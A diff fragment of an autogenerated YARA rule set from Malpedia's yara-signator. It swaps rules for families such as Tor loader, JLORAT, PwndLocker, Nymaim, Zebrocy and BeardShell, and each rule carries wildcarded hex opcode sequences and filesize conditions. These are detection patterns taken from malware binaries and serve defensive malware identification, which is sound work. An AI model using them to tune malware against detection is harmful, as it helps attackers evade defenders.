+		$sequence_5 = { 483346f0 4889842490000000 e9???????? 488b3a 4883c208 4889f8 4989fc }
+		$sequence_6 = { 488b15???????? 4c89e1 e8???????? 4989c4 e9???????? 488b43f0 488d53f0 }
+		$sequence_7 = { 488b03 4989df 4889fa 4885c0 7403 488b10 498b4f08 }
+		$sequence_8 = { 4c8d2d33db0200 e8???????? 4c89e9 4889c2 e8???????? 488b0d???????? ba18000000 }
+		$sequence_9 = { 89dd c1c507 4431d5 448b9424d8000000 428db416708b4bc2 4189da 01ee }
 
 	condition:
-		7 of them and filesize < 180224
+		7 of them and filesize < 648192
 }
-rule MALPEDIA_Win_Tor_Loader_Auto : FILE
+rule MALPEDIA_Win_Enigma_Loader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3efe54eb-a7c6-56b3-9bd1-ec8766a85b3b"
+		id = "cc26267d-179f-5094-a193-17b8c695e45b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tor_loader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tor_loader_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.enigma_loader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.enigma_loader_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "9c749aa4d74905eff81845b43499929e58555479c62182eca79940824f3864ac"
+		logic_hash = "3dcf8ded19af004c0de0e4efb8fdefb86f8c4578eb04199c475e4c233dfc8212"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -133976,32 +133759,32 @@ rule MALPEDIA_Win_Tor_Loader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 90 eb25 4839c8 0f831a030000 4c8d5001 4c39d1 0f8602030000 }
-		$sequence_1 = { bf03000000 488d358e732800 e8???????? 0fb6542447 488b7c2460 4c8b442458 4889c6 }
-		$sequence_2 = { eb0f 488b442438 c6808800000001 4889c7 ba01000000 e9???????? 81fa2251f4eb }
-		$sequence_3 = { 7659 488b842428010000 488b9c2430010000 488b9424f0000000 488b0a 488b7a08 488b7210 }
-		$sequence_4 = { eb29 4889d3 4889c1 4889f0 e8???????? 488b542448 488bb424d0000000 }
-		$sequence_5 = { ebd4 833d????????00 750d 48c705????????00000000 eb0e 488d3dfc515b00 31c9 }
-		$sequence_6 = { eb23 488d056b4d6100 31db 488b6c2410 4883c418 c3 0fb75052 }
-		$sequence_7 = { eb09 4889c7 90 e8???????? 488d0554112200 488b5c2428 488d0d86392700 }
-		$sequence_8 = { 48c7400813000000 488d0deaf90a00 488908 488b4c2410 48894810 4889c3 488d05ad3e0500 }
-		$sequence_9 = { bf04000000 e8???????? 6690 4883fb01 7509 80382d 7504 }
+		$sequence_0 = { 488d4da0 e8???????? 90 488d15acf80200 488bc8 e8???????? 0f1000 }
+		$sequence_1 = { 493bc1 0f84d9010000 4c8d4001 4c89442430 488b4910 482b0a 48c1f904 }
+		$sequence_2 = { 482b01 49b8ffffffffffffff1f 48c1fd03 4c8bfa 48c1f803 488bf9 }
+		$sequence_3 = { 488d15fb560300 488d4c2420 e8???????? cc 4053 4883ec20 488bd9 }
+		$sequence_4 = { e8???????? 90 c6462801 40387e29 0f85b6050000 bb00100000 488b542448 }
+		$sequence_5 = { 0f28c6 e8???????? 6685c0 0f8f40080000 498d4e20 488d9508020000 e8???????? }
+		$sequence_6 = { 4c8d4dd0 418bc4 41f7e0 c1ea05 0fbec2 6bc83a 418ac0 }
+		$sequence_7 = { 488d8424a8000000 4889442420 48895c2428 488933 48897308 b950000000 e8???????? }
+		$sequence_8 = { 83f901 752f 488bca e8???????? 448be0 eb22 }
+		$sequence_9 = { 57 488bec 4883ec40 448ada 488bf1 4883c120 488d55f0 }
 
 	condition:
-		7 of them and filesize < 13050880
+		7 of them and filesize < 798720
 }
-rule MALPEDIA_Win_Jlorat_Auto : FILE
+rule MALPEDIA_Win_Unidentified_039_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f0bef584-e973-53d7-a046-17a467ab2308"
+		id = "5307ab67-7df6-58f4-b452-1c07a33c71d9"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jlorat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.jlorat_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_039"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_039_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "6c508a88f484b849b2f103f8c11b47dfe4f6c1e48dc255ea3be8790051e1a3db"
+		logic_hash = "afa5455e6fc48dacd94f7935b5ea52166f1efb72a1cca9234dab50b4c119076b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -134015,32 +133798,32 @@ rule MALPEDIA_Win_Jlorat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? e9???????? 89e0 8d4d0c 8908 e8???????? 899558ffffff }
-		$sequence_1 = { eb00 8b4de0 83c134 c745f0ffffffff 89e0 8908 e8???????? }
-		$sequence_2 = { f7e2 8985d0feffff 8995d4feffff b804000000 c1e002 8b4d0c ba04000000 }
-		$sequence_3 = { eb00 8b8d7cffffff 8b45b0 894de0 0518040000 898574ffffff c745cc01000000 }
-		$sequence_4 = { e8???????? 8995c8feffff 8985ccfeffff eb00 8b8dc4feffff 8b85c8feffff 8b95ccfeffff }
-		$sequence_5 = { eb5f eb00 b801000000 83f800 7514 8b442438 8b00 }
-		$sequence_6 = { e8???????? eb00 8b4da4 83c10c c745f001000000 89e0 8d55cc }
-		$sequence_7 = { eb2a 8b4e14 8b5618 89e0 895004 8908 e8???????? }
-		$sequence_8 = { f20f1186b8010000 f20f108698010000 f20f1186d8010000 f20f108688010000 f20f108e90010000 f20f118ed0010000 f20f1186c8010000 }
-		$sequence_9 = { f20f1145d0 c745f001000000 89e0 8d55d0 895004 8908 e8???????? }
+		$sequence_0 = { 2bc8 034df4 81f1a1710000 894df8 8b45f4 8b4d0c 3bc8 }
+		$sequence_1 = { 894dfc 8b45f4 8b4df8 3bc8 7d0c ff75f8 }
+		$sequence_2 = { 837ddc00 75e6 c6460401 830eff 8bc6 2b04bd20d24100 }
+		$sequence_3 = { c745d8d9580000 8b45dc 59 59 8b4de0 }
+		$sequence_4 = { c7459c2e4c0000 c7459cd65d0000 8b459c 251f140000 89459c }
+		$sequence_5 = { 0bc1 8945d8 8b45f0 8b4df4 3bc8 7c0c }
+		$sequence_6 = { 40 663bcb 75f6 6a25 2bc2 8d4d04 51 }
+		$sequence_7 = { 6890010000 53 53 53 894538 }
+		$sequence_8 = { 0fafc1 8b4de8 2bc1 8b4dec 81e97f650000 33c1 8945f8 }
+		$sequence_9 = { 8b4dfc 0bc1 0d403a0000 8945f8 8b4508 8b4dfc 3bc8 }
 
 	condition:
-		7 of them and filesize < 10952704
+		7 of them and filesize < 262144
 }
-rule MALPEDIA_Win_Pwndlocker_Auto : FILE
+rule MALPEDIA_Win_Kegotip_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0ef9ef98-b584-5412-b76c-e3c013260c32"
+		id = "70477c51-c689-59a8-8176-7550acce9ee4"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pwndlocker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pwndlocker_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kegotip"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kegotip_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "5bc1fe4d9dda2a3d7b92f6be48794f673659ba8123fb93f2622432356a3f4a56"
+		logic_hash = "da81d78c4e1182921c0ea815e9750dcd5bacf467108d0f772088273b021761e1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -134054,34 +133837,34 @@ rule MALPEDIA_Win_Pwndlocker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 668b044e 8b721c 01de 8b0486 }
-		$sequence_1 = { 31ff 31c0 fc ac 84c0 7407 }
-		$sequence_2 = { 49 8d348a 8b36 01de 31ff 31c0 }
-		$sequence_3 = { 75e0 5a 8b7224 01de 31c0 668b044e }
-		$sequence_4 = { 01c7 ebf4 3b7df0 75e0 }
-		$sequence_5 = { 31c0 fc ac 84c0 7407 c1cf0d }
-		$sequence_6 = { 8b7224 01de 31c0 668b044e }
-		$sequence_7 = { 01d8 83c078 8b00 8d3403 8b4e18 8b5620 01da }
-		$sequence_8 = { 83c078 8b00 8d3403 8b4e18 8b5620 01da }
-		$sequence_9 = { ac 84c0 7407 c1cf0d 01c7 ebf4 }
+		$sequence_0 = { eb04 33c0 eb6d e9???????? eb63 }
+		$sequence_1 = { 85c9 740b 8b5508 0355f8 8955fc eb02 ebbb }
+		$sequence_2 = { 8b450c 50 8d8df8feffff 51 e8???????? 83c408 c785a8fcffff80000000 }
+		$sequence_3 = { 0f840c010000 6a00 6a00 6a03 6a00 6a00 6a50 }
+		$sequence_4 = { 0fb64df7 85c9 7504 32c0 eb38 c645f700 }
+		$sequence_5 = { 3b5588 7d1e 8b4508 038578ffffff 0fbe4801 }
+		$sequence_6 = { ff5510 83c408 0fb6c8 85c9 7504 32c0 eb07 }
+		$sequence_7 = { 6a00 6800000080 8d95d8feffff 52 ff15???????? 8945e4 837de4ff }
+		$sequence_8 = { 32c0 e9???????? 68???????? e8???????? 83c404 68???????? }
+		$sequence_9 = { 3b4dfc 7324 8b5510 0355e4 8b45f4 0345f8 }
 
 	condition:
-		7 of them and filesize < 65536
+		7 of them and filesize < 278528
 }
-rule MALPEDIA_Win_Nymaim_Auto : FILE
+rule MALPEDIA_Win_Bamital_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "30c4b930-78a7-5077-a5dc-408a5cbb77f2"
+		id = "e219e6ea-4608-5a74-87dd-c6cc7daca55c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nymaim_auto.yar#L1-L209"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bamital"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bamital_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "84775fe355e4469ac977f6fbd11fdede8794d879792df66f4d5d03f1510d45b2"
+		logic_hash = "24d30014c19935766f45a136deb9c4126e6e7e91127fb6207f37108ee605d496"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -134093,45 +133876,32 @@ rule MALPEDIA_Win_Nymaim_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 89d8 01c8 31d2 f7f7 }
-		$sequence_1 = { f7f7 92 31d2 bf64000000 }
-		$sequence_2 = { 0f94c1 09c8 6bc064 09c0 }
-		$sequence_3 = { 38f0 83d100 38d0 83d900 }
-		$sequence_4 = { 010d???????? 8b1d???????? 011d???????? c1eb13 }
-		$sequence_5 = { c1eb13 331d???????? 31c3 c1e808 }
-		$sequence_6 = { 31c3 891d???????? 89d8 01c8 }
-		$sequence_7 = { 31d2 bf64000000 f7f7 5b }
-		$sequence_8 = { 38d0 83d900 c1e105 01c8 }
-		$sequence_9 = { 00d3 8a16 301e 46 01fb }
-		$sequence_10 = { c1e808 31c3 895e0c 89d8 }
-		$sequence_11 = { 8b5604 0116 8b4e08 014e04 8b5e0c }
-		$sequence_12 = { 8b5d18 8b1b 4f 31c0 fec2 }
-		$sequence_13 = { f7e0 0fc8 01d0 894704 }
-		$sequence_14 = { 8b5514 8b12 8b4d0c 8b5d18 }
-		$sequence_15 = { 31c9 8b55f4 8b75ec 89723c c7424003000000 }
-		$sequence_16 = { 56 83ec28 8b450c 8b4d08 8d154e30d201 }
-		$sequence_17 = { 83ec44 8b4508 8d0d2030d201 31d2 890c24 c744240400000000 }
-		$sequence_18 = { 890424 894c2404 e8???????? 8d0d3430d201 }
-		$sequence_19 = { 5b 5d c3 8b45f0 8b0c850440d201 }
-		$sequence_20 = { 53 56 57 83ec44 8b4508 8d0d2030d201 }
-		$sequence_21 = { 31d2 890c24 c744240400000000 8945f4 8955f0 e8???????? 8d0d8630d201 }
-		$sequence_22 = { 55 89e5 83ec10 8b4508 8d0d3430d201 }
+		$sequence_0 = { 803820 7516 83c101 83f901 7504 8bd0 }
+		$sequence_1 = { 2945f8 ff75f8 e8???????? 5e ff75f8 56 }
+		$sequence_2 = { 33c0 5e 5f 5b 5a 59 }
+		$sequence_3 = { 52 e8???????? 837dd800 7505 e9???????? }
+		$sequence_4 = { b910000000 f3ab eb0c 8bcb f3a4 011d???????? }
+		$sequence_5 = { 8b55fc 8945fc 0bd2 7406 52 e8???????? }
+		$sequence_6 = { 5b 5a 59 c9 c21000 33c0 5e }
+		$sequence_7 = { 83c024 6a00 50 e8???????? }
+		$sequence_8 = { 75f1 8d0411 33c2 5f 5e c9 }
+		$sequence_9 = { e8???????? 83c708 57 ff7004 e8???????? 83c708 }
 
 	condition:
-		1 of them and filesize < 2375680
+		7 of them and filesize < 90112
 }
-rule MALPEDIA_Win_Urausy_Auto : FILE
+rule MALPEDIA_Win_Ddkong_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1beffaf4-c79f-5031-ba16-920ad7ce2336"
+		id = "18188be3-073f-50a3-9f50-97e094dccbb5"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.urausy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.urausy_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ddkong"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ddkong_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "8b8a7bd5c9e36633624e07a893f13b5d5c82edf3b42773503b98b1177601ac24"
+		logic_hash = "91db8e15d23c634005ba3b638556ede7055d1f867550b80fb7edc67358abbb64"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -134145,32 +133915,32 @@ rule MALPEDIA_Win_Urausy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff7508 e8???????? 8945ec ff7514 e8???????? 8945e8 }
-		$sequence_1 = { ff75a0 ff75ec e8???????? 33c0 b4ff b0ff c1c008 }
-		$sequence_2 = { e8???????? 5e 6a00 6a00 6a00 }
-		$sequence_3 = { ff7594 ff7598 ff75ec e8???????? 33c0 }
-		$sequence_4 = { 6a28 ff75e4 ff75e8 6802000050 68???????? 68???????? 6800000400 }
-		$sequence_5 = { e8???????? 53 e8???????? 8d85f8fdffff }
-		$sequence_6 = { ff75e8 e8???????? c9 c21000 55 8bec 81c4ecefffff }
-		$sequence_7 = { 8b4508 50 8b00 ff5018 8d45e0 }
-		$sequence_8 = { 83c4e8 833d????????01 7504 c9 }
-		$sequence_9 = { e8???????? c9 c20400 55 8bec 83c4e8 8d45f0 }
+		$sequence_0 = { 8065d300 8d45c0 50 53 ffd6 50 ffd7 }
+		$sequence_1 = { c644241561 c64424166c c644241746 c644241b00 ff15???????? 50 ff15???????? }
+		$sequence_2 = { ebcd 53 53 53 }
+		$sequence_3 = { bb???????? 50 53 c645a457 c645a561 c645a669 }
+		$sequence_4 = { 8d8500ffffff 50 53 ffd7 }
+		$sequence_5 = { 56 8b35???????? 8d45ec 57 bb???????? 50 53 }
+		$sequence_6 = { c645b474 8d45ac c645b541 50 8d45f0 }
+		$sequence_7 = { 8d45a4 bb???????? 50 53 }
+		$sequence_8 = { 7427 837d08ff 7421 8d45dc 6a10 50 ff7508 }
+		$sequence_9 = { 50 ffd6 898504ffffff 8d45c4 }
 
 	condition:
-		7 of them and filesize < 98304
+		7 of them and filesize < 81920
 }
-rule MALPEDIA_Win_Nitlove_Auto : FILE
+rule MALPEDIA_Win_Zebrocy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "84765628-80ab-5981-9ee3-a789670212a2"
+		id = "a5288975-5a36-5a4a-9025-084c7ee804a2"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nitlove"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nitlove_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zebrocy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.zebrocy_auto.yar#L1-L166"
 		license_url = "N/A"
-		logic_hash = "6dc343446a186927b9f2cf65101150f5f9c6342bdace19bd149edbf93300570a"
+		logic_hash = "31a3a19dc89466809ccbf56c8c805a07b997358dbb942052f14c84a36be45691"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -134184,32 +133954,38 @@ rule MALPEDIA_Win_Nitlove_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 57 6a0b 59 be???????? 8d7dc8 f3a5 b902000080 }
-		$sequence_1 = { 03f0 c1e007 33f0 42 3bd7 7ce9 33c0 }
-		$sequence_2 = { b359 51 8d857cffffff 50 51 }
-		$sequence_3 = { 6a00 6aff ffd0 bab2bb282b 8bcb }
-		$sequence_4 = { 6aff ffd7 0fb785dcfeffff 33c9 ba1e3d0000 66898c0504feffff }
-		$sequence_5 = { ba4d8a978a 8bcb e8???????? ffd0 51 }
-		$sequence_6 = { 56 57 83ceff 33ff 8bd9 85d2 7e21 }
-		$sequence_7 = { 6a05 ffd6 833b00 747a 33db }
-		$sequence_8 = { e8???????? 8b45ec 83c43c 5f }
-		$sequence_9 = { 33f6 8b45f0 0345e4 8b4dd4 }
+		$sequence_0 = { c605????????03 c705????????04000000 c605????????11 c705????????00000000 }
+		$sequence_1 = { e8???????? 84c0 8b4de0 7507 }
+		$sequence_2 = { 50 8d45f4 64a300000000 6aff 33ff c745fc01000000 }
+		$sequence_3 = { 8be5 5d c21000 8b4d14 51 56 }
+		$sequence_4 = { e8???????? 83c41c 83ec1c 8bcc 89a5f4f4ffff }
+		$sequence_5 = { ff25???????? ebb5 55 b9???????? 89e5 }
+		$sequence_6 = { f2ae 89c8 f7d0 8d5402ff }
+		$sequence_7 = { 8bd8 3bc7 7e63 8d642400 6a02 }
+		$sequence_8 = { 397de0 7f57 8b03 85c0 }
+		$sequence_9 = { 8d45f4 64a300000000 33db 897d90 895d94 6aff c745fc01000000 }
+		$sequence_10 = { 89d8 e8???????? 8d9510fcffff 89c6 8d8500fcffff 89d7 }
+		$sequence_11 = { 89c7 eb2f 89f2 89d9 e8???????? }
+		$sequence_12 = { 325032 7032 7c32 9c 32a432ac32c432 d432 e8???????? }
+		$sequence_13 = { 33c0 894e14 894710 894714 c645fc00 837de810 720c }
+		$sequence_14 = { 66c705????????6046 8915???????? ba???????? a3???????? e8???????? }
+		$sequence_15 = { 89b5c4f7ffff 899dc0f7ffff 889db0f7ffff 39bd38f7ffff }
 
 	condition:
-		7 of them and filesize < 49152
+		7 of them and filesize < 393216
 }
-rule MALPEDIA_Win_Syscon_Auto : FILE
+rule MALPEDIA_Win_Dexbia_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5a8ce706-db42-58e3-9d51-88fe0c5beb4f"
+		id = "10b4a5d0-b360-57a4-9e4b-c6a9cc13bd8b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.syscon"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.syscon_auto.yar#L1-L167"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dexbia"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dexbia_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "e30c1d08a4b5a8899edc4bd6891355bf1333e55e03f2135a162795fd594797ac"
+		logic_hash = "a367731eb970680df53cbd5e2b030972026c39b111bddedbf1b2202ab2b56805"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -134223,40 +133999,34 @@ rule MALPEDIA_Win_Syscon_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33c4 898424d80b0000 53 56 }
-		$sequence_1 = { 47 83c604 897df8 80fb40 7412 8a55ff }
-		$sequence_2 = { 8d942414040000 68???????? 52 ff15???????? 83c40c 6a00 }
-		$sequence_3 = { 57 8bc6 e8???????? 83c408 56 }
-		$sequence_4 = { 68e8030000 ffd6 6a00 6a20 6a03 }
-		$sequence_5 = { a1???????? 68???????? 50 ff15???????? 85c0 0f846affffff }
-		$sequence_6 = { ff15???????? e9???????? 8b8c24e40b0000 5f }
-		$sequence_7 = { eb0c 53 68???????? ff15???????? 57 }
-		$sequence_8 = { 488d5590 488d0daa300000 448bc0 e8???????? 488d8d20040000 }
-		$sequence_9 = { e8???????? 488d0dab460000 ff15???????? 488d542420 488d0d99460000 }
-		$sequence_10 = { 498bcc ff15???????? 488bcf ff15???????? bf04010000 }
-		$sequence_11 = { 488d4c2440 448bc3 33d2 e8???????? 488d542440 b904010000 ff15???????? }
-		$sequence_12 = { 488d8d90050000 488d159e2f0000 ff15???????? 488d9590050000 488d8d60010000 e8???????? 488d8d60010000 }
-		$sequence_13 = { c705????????02000000 83f901 750a c705????????01000000 890d???????? 488b0d???????? 8915???????? }
-		$sequence_14 = { 488d0d07460000 448bc0 e8???????? 488d542420 }
-		$sequence_15 = { 89542420 4c8d442450 488d8d90050000 488d1514310000 }
+		$sequence_0 = { 66ab aa b9ff040000 33c0 8dbc249d260000 be???????? f3ab }
+		$sequence_1 = { 8d8ef8000000 8d9638010000 51 52 e8???????? 83c408 }
+		$sequence_2 = { 8bca 83c020 83e103 8d9424a0120000 f3a4 8d8c24a0260000 }
+		$sequence_3 = { 72c1 8b4508 c705????????01000000 50 a3???????? e8???????? 8db6ec894000 }
+		$sequence_4 = { 60 55 40 008c554000b055 }
+		$sequence_5 = { 81c444040000 68a00f0000 ffd5 e9???????? 53 8d8c2418100000 53 }
+		$sequence_6 = { e8???????? 8d942468040000 50 52 68???????? }
+		$sequence_7 = { 8bb42480010000 8bbc2484010000 c744241400000000 6a64 }
+		$sequence_8 = { 85c0 0f85e5feffff 8bd7 b9ff090000 8dbc2455040000 88842454040000 }
+		$sequence_9 = { 33c0 8d7c247d c644247c00 f3ab 66ab aa }
 
 	condition:
-		7 of them and filesize < 120832
+		7 of them and filesize < 106496
 }
-rule MALPEDIA_Win_Redcurl_Auto : FILE
+rule MALPEDIA_Win_Croxloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d681119a-f653-5bed-a537-3617b5c42d11"
+		id = "74969832-3646-5c22-9967-7e8cb3d178d9"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.redcurl"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.redcurl_auto.yar#L1-L199"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.croxloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.croxloader_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "e9dbdef2d970be2c43c2c35ff66ca296c8c7b5f23d7ab81a2c0ef377599edc93"
+		logic_hash = "5587745f089fbff18eabf5b798d40f2503c06a9701158cb607e6e154e3ca0b65"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -134268,45 +134038,34 @@ rule MALPEDIA_Win_Redcurl_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 2bc6 48 50 56 }
-		$sequence_1 = { f7f9 80c261 88143e 47 }
-		$sequence_2 = { ff15???????? 8bd0 c7461000000000 8bca }
-		$sequence_3 = { 6a00 6a00 6aff 8bf8 6a00 57 }
-		$sequence_4 = { 6a00 6a00 50 53 ff15???????? 6a00 6a00 }
-		$sequence_5 = { 85ff 747a 85c0 7476 6800010000 }
-		$sequence_6 = { 8bf0 6a00 6a03 6a00 }
-		$sequence_7 = { 0f85e90b0000 eb00 f30f7e442404 660f2815???????? 660f28c8 }
-		$sequence_8 = { 8b4610 3bc2 726f 2bc2 }
-		$sequence_9 = { 3bc2 0f42d0 0fb6041a 03d3 }
-		$sequence_10 = { e8???????? c745e800000000 c745ec0f000000 c645d800 8d5001 8b4610 }
-		$sequence_11 = { 6a00 6a50 51 56 ff15???????? 8bd8 }
-		$sequence_12 = { 726f 2bc2 83c9ff 83f8ff 0f42c8 }
-		$sequence_13 = { 8d4590 c7458c00000000 894588 c6459000 e8???????? }
-		$sequence_14 = { c70424???????? e8???????? 8b5304 83c001 83ec0c 39d0 }
-		$sequence_15 = { c785acfcffff00000000 8985a8fcffff 8d8580fdffff c7442408???????? }
-		$sequence_16 = { 0f84f31d0000 0fb60e 83c601 3dff000000 }
-		$sequence_17 = { 0fb607 888598feffff 8b852cfdffff 89b594feffff }
-		$sequence_18 = { 0f84b70c0000 8bb538feffff 39f2 0f86c50a0000 }
-		$sequence_19 = { 890424 e8???????? 8b85c4fbffff 83ec08 8d9510feffff }
-		$sequence_20 = { 8944240c 8b856cfdffff 89442404 e8???????? 83ec10 8d8500fcffff }
+		$sequence_0 = { 488d4e18 41b801010000 e8???????? 418bc6 4d8d4d10 4c8d3d901d0100 }
+		$sequence_1 = { 4156 4157 488b05???????? 4d8bf8 448bf2 8bf1 4885c0 }
+		$sequence_2 = { 498bce ff15???????? 488bd8 eb02 33db 4c8d358d93ffff 4885db }
+		$sequence_3 = { 48c7c1ffffffff ff15???????? 488bbc2480030000 488b8c2460030000 }
+		$sequence_4 = { 4c8d052aad0000 488bf9 488d1528ad0000 b904000000 e8???????? 8bd3 488bcf }
+		$sequence_5 = { 4883ec20 448bf9 4c8d356e94ffff 4d8be1 }
+		$sequence_6 = { 48895c2408 57 4883ec20 488d1d5f290100 488d3d58290100 eb12 488b03 }
+		$sequence_7 = { 33db 4c8d358d93ffff 4885db 750d }
+		$sequence_8 = { 410f42d0 6bdb21 0fb6d2 03da 48ffc0 ebd6 8bc8 }
+		$sequence_9 = { 803d????????00 754c 488d0db41e0100 48890d???????? 488d05661b0100 488d0d8f1d0100 488905???????? }
 
 	condition:
-		7 of them and filesize < 487424
+		7 of them and filesize < 241664
 }
-rule MALPEDIA_Win_Karius_Auto : FILE
+rule MALPEDIA_Win_Beardshell_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f864f52d-97b4-52e1-be47-a43becf89939"
+		id = "0fef5153-0695-5651-88d6-fa2574fcc87d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.karius"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.karius_auto.yar#L1-L233"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.beardshell"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.beardshell_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "65d32f5659cb602716004ef37e85991451736e33f4d393130adf2e3c033195f4"
+		logic_hash = "104b3d19aef271122113e5b1a20be0ecaabcd5f4198f381800365cc8cf878c7b"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -134318,48 +134077,32 @@ rule MALPEDIA_Win_Karius_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
